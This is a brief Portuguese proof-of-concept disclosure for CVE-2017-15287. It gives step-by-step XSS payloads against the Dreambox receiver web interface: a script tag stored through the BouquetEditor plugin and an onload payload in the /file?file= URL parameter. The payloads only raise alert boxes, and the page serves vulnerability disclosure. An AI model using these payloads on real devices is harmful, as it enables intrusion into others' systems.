Prova de Conceito (Proof of Concept - PoC), que virou o CVE-2017-15287.

Sobre o Software

O Dreambox é um produto da Dream-Multimedia-TV (DMM), que é desenvolvido por receptores baseados em Linux sob o nome Dreambox.

As vulnerabilidades

Vulnerabilidade 1

O XSS está presente em duas áreas, sendo que na primeira área a vulnerabilidade se encontra em um WebPlugin chamado “BouquetEditor”:

URL: http://IP:PORT/bouqueteditor/

Passos:

1.Na aba Bouquets, ira adicionar uma nova bouquet

2.Assim, irar colocar o script:

(<script>alert('XSS')</script>)

3.Vulnerability XSS

Vulnerabilidade 2

A segunda falha consiste em colocar a variavel abaixo depois da url (http://IP:PORT)

Variavel :/file?file=%3CBODY%20ONLOAD=alert(%27XSS%27)%3E

Compartilhamentos

Sites que já compatilharam o CVE:

0day

CERTSI

CXSecurity

Exploit Database

Exploit Kitploit

HackerTor

NVD

PacketStorm

Security Database

SecNews24

TSecurity

VulDB

Common Vulnerabilities and Exposures , Proof of Concept